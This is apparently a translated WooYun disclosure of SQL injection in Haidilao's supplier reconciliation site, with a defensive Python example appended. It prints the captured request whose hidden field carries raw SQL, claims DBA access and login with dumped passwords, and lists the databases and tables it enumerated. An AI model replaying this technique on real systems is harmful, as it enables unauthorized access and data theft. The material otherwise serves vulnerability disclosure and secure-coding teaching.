
Vulnerability Summary

Defect ID: wooyun-2013-033223

Title: High-privilege SQL injection in an important Haidilao system leads to full compromise

Vendor: haidilao.com

Author: 小胖子

Submitted: 2013-08-02 09:11

Fixed: 2013-09-16 09:12

Published: 2013-09-16 09:12

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2013-08-02: Details sent to the vendor, awaiting vendor handling
2013-08-02: Vendor confirmed; details disclosed to the vendor only
2013-08-12: Details disclosed to core white hats and relevant domain experts
2013-08-22: Details disclosed to regular white hats
2013-09-01: Details disclosed to intern white hats
2013-09-16: Details disclosed to the public

Brief description:

Yet another one that starts with broken access control. Whatever can be reached without authorization, you basically don't filter at all, and this time it hurts.
A hacker who doesn't want to eat at Haidilao is not a good shift leader.

Detailed description:

System: online reconciliation system, http://duizhang.haidilao.com/
This one counts as fairly important.
At first glance the login looked fairly strict:

1) Suppliers please note: the first 5 characters of your username are 00000,
2) 5 wrong passwords within 10 minutes and the username is locked automatically
3) Before you get locked out, click "forgot password" to recover by email!
4) Please set your email address and password-recovery question under Profile and Password as soon as possible


Looks strict, so brute forcing was out of the question, but you can't guard against everything.
I found a URL.
http://duizhang.haidilao.com/log.aspx
Opening it gave access without authorization, and to quite a lot of information.



Then, simply adding a single quote in the search box produced an error.

[Screenshot: error message]


So I captured the request.

POST /log.aspx HTTP/1.1
Host: duizhang.haidilao.com
Proxy-Connection: keep-alive
Content-Length: 4785
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://duizhang.haidilao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://duizhang.haidilao.com/log.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ezn0twltmlmhzptvkxzzubux

__VIEWSTATE=[base64 ViewState blob omitted]&__EVENTVALIDATION=[blob omitted]&tbxDateFrom=2013-08-01&tbxDateTo=2013-08-01&tbxMSG=&btnSearch=%E6%90%9C%E7%B4%A2&s_Action=&s_sqlAll=select+top+1000+log_datetime%2Cmsg+from+log++where+msg+like+%27%25%E5%90%8C%E6%AD%A5%25%27++and+log_datetime+%3E%3D+%272013-08-01%27+and+log_datetime+%3C%3D+%272013-08-01+23%3A59%3A59%27+order+by+log_datetime+desc&s_Search=+and+log_datetime+%3E%3D+%272013-08-01%27+and+log_datetime+%3C%3D+%272013-08-01+23%3A59%3A59%27&hidTemp=


Now for POST injection.

[Screenshot: DBA privileges]


The privileges turned out to be high: DBA. Injection speed was first-rate too.
It dumped plenty of weak passwords; continuing the penetration from here, one could work out your habits.


Then logged into the system:


Then, so much information in there, damn.


Over.

Proof of vulnerability:

available databases [10]:
[*] dtest
[*] duizhang
[*] hetong
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test1


Database: duizhang
[43 tables]
+------------------------------------+
| dbo.BILL_DRAFT |
| dbo.BILL_FLOW_STACK |
| dbo.BILL_FLOW_STATE_COM |
| dbo.BILL_RELATION |
| dbo.Budget_BillLeave |
| dbo.DOC_ISSUE |
| dbo.DOC_MIND |
| dbo.DOC_TEMPLATE |
| dbo.EVENTS |
| dbo.FLOWBASE |
| dbo.FLOW_LIST |
| dbo.HEADSHIP |
| dbo.HS_CASH_INIT |
| dbo.HS_POSITION |
| dbo.HS_SHIP |
| dbo.IDFACTORY |
| dbo.IDFACTORY2 |
| dbo.R_ContractInfo |
| dbo.R_GatherInfo |
| dbo.R_Invoice |
| dbo.R_ProjPlanDoc |
| dbo.R_ProjectDetail |
| dbo.R_ProjectJob |
| dbo.R_ProjectJobLog |
| dbo.R_ProjectLog |
| dbo.R_ProjectMember |
| dbo.R_ProjectPhase |
| dbo.R_ProjectProblem |
| dbo.R_Relation_Order |
| dbo.SUBJECT |
| dbo.USER_INFO |
| dbo.aspnet_Membership |
| dbo.aspnet_Paths |
| dbo.aspnet_PersonalizationAllUsers |
| dbo.aspnet_PersonalizationPerUser |
| dbo.aspnet_Profile |
| dbo.aspnet_Roles |
| dbo.aspnet_Users |
| dbo.aspnet_UsersInRoles |
| dbo.budget_plan_sum_bgt |
| dbo.v_hdl_order |
| dbo.v_hdl_order_special |
| dbo.v_hdl_receieved_bill |
+------------------------------------+

Fix recommendations:

0x1: Unauthorized access must never be possible.
0x2: Filter properly against injection.
0x3: The database account's privileges are far too high; is the hetong database for contracts? That careless!!
0x4: Fellow Sichuanese, hand over the 20 rank, the gifts, and the free Haidilao vouchers!!!!!
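As an added illustration (not code from the report or from the Haidilao system), the handler below is a hypothetical Python/sqlite re-creation of the log.aspx search. The field names tbxDateFrom, tbxDateTo, tbxMSG, s_sqlAll and s_Search come from the captured request above; the table rows are constructed. The vulnerable form executes whatever statement the client puts in s_sqlAll and splices tbxMSG into the LIKE clause by concatenation, which is why a lone single quote raised an error; the hardened form never reads the SQL-carrying fields, validates the dates, and binds every value as a parameter.

```python
import re
import sqlite3
from datetime import date

# Constructed stand-in for the site's log table; rows are made up, not data from the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE log (log_datetime TEXT, msg TEXT)")
    db.executemany("INSERT INTO log VALUES (?, ?)", [
        ("2013-08-01 13:36:50", "sync [2013-07-31] orders 669; sap pulled 677"),
        ("2013-08-01 12:37:54", "sync [2013-07-31] orders 669; sap pulled 677"),
        ("2013-07-31 09:00:00", "startup 100% complete"),
    ])
    return db

def vulnerable_search(db, form):
    """Hypothetical handler shaped like the observed request: the whole
    statement travels in the hidden s_sqlAll field and is executed as-is,
    and the search box is spliced into a LIKE by concatenation."""
    sql = form.get("s_sqlAll") or (
        "select log_datetime, msg from log where msg like '%"
        + form.get("tbxMSG", "") + "%'" + form.get("s_Search", ""))
    return db.execute(sql).fetchall()  # SQL text is client-controlled

def hardened_search(db, form):
    """The server owns the statement; the client supplies only values.
    s_sqlAll and s_Search are never read, so they cannot alter the query."""
    date_from = date.fromisoformat(form["tbxDateFrom"])  # ValueError on non-dates
    date_to = date.fromisoformat(form["tbxDateTo"])
    if date_to < date_from:
        raise ValueError("tbxDateTo precedes tbxDateFrom")
    # Escape LIKE metacharacters so the search text is matched literally.
    needle = re.sub(r"([\\%_])", r"\\\1", form.get("tbxMSG", ""))
    sql = ("SELECT log_datetime, msg FROM log "
           "WHERE msg LIKE ? ESCAPE '\\' "
           "AND log_datetime >= ? AND log_datetime <= ? "
           "ORDER BY log_datetime DESC LIMIT 1000")
    params = (f"%{needle}%", f"{date_from} 00:00:00", f"{date_to} 23:59:59")
    return db.execute(sql, params).fetchall()

if __name__ == "__main__":
    db = make_db()
    q = {"tbxDateFrom": "2013-08-01", "tbxDateTo": "2013-08-01", "tbxMSG": "'"}
    print(hardened_search(db, q))  # [] : a quote is just text now
```

Restricting the database login to SELECT on the log table (rather than the DBA role seen in the report) limits what any remaining injection could reach.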

Copyright notice: please credit 小胖子@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-08-02 10:02

Vendor reply:

Thank you for reporting this vulnerability; we are working hard to fix it.

Latest status:

None yet